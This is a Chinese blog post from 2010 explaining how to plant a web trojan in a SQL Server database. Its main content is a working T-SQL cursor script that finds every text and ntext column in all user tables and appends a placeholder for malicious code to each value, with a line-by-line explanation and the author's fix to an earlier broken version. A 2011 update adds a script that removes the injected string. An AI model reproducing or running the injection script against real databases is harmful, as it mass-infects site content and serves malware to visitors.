SQL Server 数据库挂马

Posted on 2010-07-02 by tunpishuang

来自http://tunps.com/sql-server-trojan-hosting

DECLARE @T varchar(8000)
DECLARE @C varchar(8000)
DECLARE cur CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35)
OPEN cur
FETCH NEXT FROM cur INTO @T,@C
WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec('update ['+@T+'] set ['+@C+']=convert(varchar(8000),['+@C+'])+''挂马代码''')
    FETCH NEXT FROM cur INTO @T,@C
    END
CLOSE cur
DEALLOCATE cur

解释一下,声明一个游标,通过对sysobjects和syscolunms的连表查询出所有text或则是ntext类型的字段,然后将text,ntext字段转换成varchar后附加上挂马代码。 附: xtype=99 ntext xtype=35 text xtype=231 nvarchar xtype=167 varchar 参考:http://huaidan.org/archives/1922.html,但是这个运行错误,已经去掉中文引号。

update:2011.07.27

如果想去掉已挂的马,可以用以下代码,T-SQL的replace函数。

DECLARE @T varchar(8000)
DECLARE @C varchar(8000)
DECLARE cur CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35)
OPEN cur
FETCH NEXT FROM cur INTO @T,@C
WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec('update ['+@T+'] set ['+@C+']=replace(convert(varchar(8000),['+@C+']),''挂马代码'','''') ')
    FETCH NEXT FROM cur INTO @T,@C
    END
CLOSE cur
DEALLOCATE cur

 

About tunpishuang

just 4 fun·····
This entry was posted in 未分类 and tagged . Bookmark the permalink.

One Response to SQL Server 数据库挂马

  1. Pingback: mysql挂马存储过程 | TechGuru

发表评论

电子邮件地址不会被公开。 必填项已用 * 标注

*

您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>